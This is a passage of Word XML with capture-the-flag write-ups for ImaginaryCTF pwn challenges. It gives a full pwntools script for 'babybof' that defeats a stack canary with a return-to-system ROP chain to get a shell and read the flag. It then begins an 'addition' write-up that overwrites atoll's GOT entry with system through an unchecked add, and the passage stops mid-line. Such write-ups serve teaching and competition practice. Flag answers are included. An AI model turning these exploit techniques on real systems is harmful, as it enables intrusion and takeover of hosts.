    <w:p w14:paraId="643864A0" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>+ p64(pop_rdi_ret)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62793A52" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>+ p64(binsh)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBF40B7" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>+ p64(system)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4722A005" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="00000000" w:rsidP="000D4C0E">
      <w:r>
        <w:pict w14:anchorId="1863AE52">
          <v:rect id="_x0000_i1042" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1661BD1B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Implementation (pwntools)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA06DC1" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>from pwn import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9F60C1" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>import re</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4F8536" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E"/>
    <w:p w14:paraId="31B62BD4" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>HOST, PORT = 'babybof.chal.imaginaryctf.org', 1337</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BC3B3C" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>context.arch</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve"> = 'amd64'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343930C2" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>BUF = 56</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111052A7" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E"/>
    <w:p w14:paraId="3A3F91C8" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>def parse_leaks(b):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C87994" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve">    t = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>b.decode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>(errors='ignore')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CECE707" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve">    sys_   = int(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>re.search</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>(r'^\s*system\s*@\s*(0x[0-9a-fA-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>F]+</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>)\s*$', t, re.M</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>).group</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>(1), 16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1767BD3B" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>popr  =</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>int(re.search</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>(r'^\s*pop rdi; ret\s*@\s*(0x[0-9a-fA-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>F]+</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>)\s*$', t, re.M</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>).group</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>(1), 16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D33111" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>retg  =</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve"> int(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>re.search</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>(r'^\s*ret\s*@\s*(0x[0-9a-fA-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>F]+</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>)\s*$', t, re.M</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>).group</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>(1), 16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0E083C" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    binsh = int(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>re.search</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>(r'^\s*"/bin/sh"\s*@\s*(0x[0-9a-fA-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>F]+</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>)\s*$', t, re.M</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>).group</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>(1), 16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5E9BFA" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve">    can   = int(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>re.search</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>(r'^\s*canary:\s*(0x[0-9a-fA-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>F]+</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>)\s*$', t, re.M</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>).group</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>(1), 16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17927674" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve">    return sys_, popr, retg, binsh, can</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D6EF32" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E"/>
    <w:p w14:paraId="18A32DB4" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve">io = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>remote(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>HOST, PORT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471D1261" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve">banner = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>io.recvuntil</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>(b'input', drop=False)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4156F1B9" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>system, pop_rdi_ret, retg, binsh, canary = parse_leaks(banner)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8421EB" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E"/>
    <w:p w14:paraId="4B161ACC" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>io.recvuntil</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>(b':')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0EE990" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>payload  =</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve"> b'A'*BUF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192310E8" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>payload += p64(canary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714C54B8" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>payload += b'B'*8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185AF8C7" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>payload += p64(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve">retg)   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve">        # alignment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7506AD5A" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>payload += p64(pop_rdi_ret)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C354557" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>payload += p64(binsh)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B1E6F5" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>payload += p64(system)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF6225D" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>io.sendline</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26913010" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E"/>
    <w:p w14:paraId="2AEDAD55" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>io.sendline</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>(b'cat flag.txt')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1F4F58" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>io.recvline</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>(timeout=2</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>).decode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>(errors='ignore'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>).strip</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B33EF62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Gotcha that bit me</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12736BBB" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>Make sure your regex for the plain ret line doesn’t accidentally capture the pop rdi; ret line. Anchor each pattern to its line (use ^...$ with re.M). If you mistakenly use pop rdi; ret where a plain ret is expected, your stack alignment breaks and the process exits (EOF).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F8926A" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="00000000" w:rsidP="000D4C0E">
      <w:r>
        <w:pict w14:anchorId="43233C7B">
          <v:rect id="_x0000_i1043" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B15D02A" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D4C0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDFA536" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>After sending the payload, we get a shell and read the flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D1ED2C" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>ictf{arent_challenges_written_two_hours_before_ctf_amazing}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2438F167" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRDefault="00FE5FE2"/>
    <w:p w14:paraId="2C63FD8B" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B2A08">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>addition (ImaginaryCTF) — Write-up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130286DB" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:r w:rsidRPr="005B2A08">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Category:</w:t>
      </w:r>
      <w:r w:rsidRPr="005B2A08">
        <w:t xml:space="preserve"> pwn</w:t>
      </w:r>
      <w:r w:rsidRPr="005B2A08">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005B2A08">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Target:</w:t>
      </w:r>
      <w:r w:rsidRPr="005B2A08">
        <w:t xml:space="preserve"> nc addition.chal.imaginaryctf.org 1337</w:t>
      </w:r>
      <w:r w:rsidRPr="005B2A08">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005B2A08">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag:</w:t>
      </w:r>
      <w:r w:rsidRPr="005B2A08">
        <w:t xml:space="preserve"> ictf{i_love_finding_offsets_4fd29170cb90}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FC2C5D" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B2A08">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TL;DR</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7F3EDD73" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:r w:rsidRPr="005B2A08">
        <w:t>The program repeatedly asks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C273AC" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:r w:rsidRPr="005B2A08">
        <w:t>add where?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DC60BB" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:r w:rsidRPr="005B2A08">
        <w:t>add what?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5877B834" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:r w:rsidRPr="005B2A08">
        <w:t xml:space="preserve">and does a </w:t>
      </w:r>
      <w:r w:rsidRPr="005B2A08">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>64-bit add</w:t>
      </w:r>
      <w:r w:rsidRPr="005B2A08">
        <w:t xml:space="preserve"> at *(buf + where) += what with </w:t>
      </w:r>
      <w:r w:rsidRPr="005B2A08">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>no bounds check</w:t>
      </w:r>
      <w:r w:rsidRPr="005B2A08">
        <w:t xml:space="preserve">. We can write outside buf and hit the </w:t>
      </w:r>
      <w:r w:rsidRPr="005B2A08">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GOT</w:t>
      </w:r>
      <w:r w:rsidRPr="005B2A08">
        <w:t xml:space="preserve">. If we add </w:t>
      </w:r>
      <w:r w:rsidRPr="005B2A08">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(system - atoll)</w:t>
      </w:r>
      <w:r w:rsidRPr="005B2A08">
        <w:t xml:space="preserve"> to atoll@GOT, the next call to atoll becomes a call to system, with our input string as its argument. Then we send cat flag.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E28DAB" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="00000000" w:rsidP="005B2A08">
      <w:r>
        <w:pict w14:anchorId="6F98C4C0">
          <v:rect id="_x0000_i1044" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="25618661" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B2A08">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296D05FD" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:r w:rsidRPr="005B2A08">
        <w:t>From reversing (strings/ghidra) the loop is essentially:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568B9114" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:r w:rsidRPr="005B2A08">
        <w:t>while (1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434981C2" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:r w:rsidRPr="005B2A08">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t>puts(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t>"add where?");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7603D2FA" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:r w:rsidRPr="005B2A08">
        <w:t xml:space="preserve">  long off = atoll(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t>readline(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC1C96B" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:r w:rsidRPr="005B2A08">
        <w:t xml:space="preserve">  if (off == 1337) break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2458C672" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08"/>
    <w:p w14:paraId="7CC1BC35" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:r w:rsidRPr="005B2A08">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t>puts(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t>"add what?");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5E3152" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:r w:rsidRPr="005B2A08">
        <w:t xml:space="preserve">  long val = atoll(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t>readline(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B96D833" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08"/>
    <w:p w14:paraId="74F10C51" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:r w:rsidRPr="005B2A08">
        <w:t xml:space="preserve">  *(long </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t>*)(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t xml:space="preserve">(char </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t>*)buf</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t xml:space="preserve"> + off) += </w:t>
      </w:r>
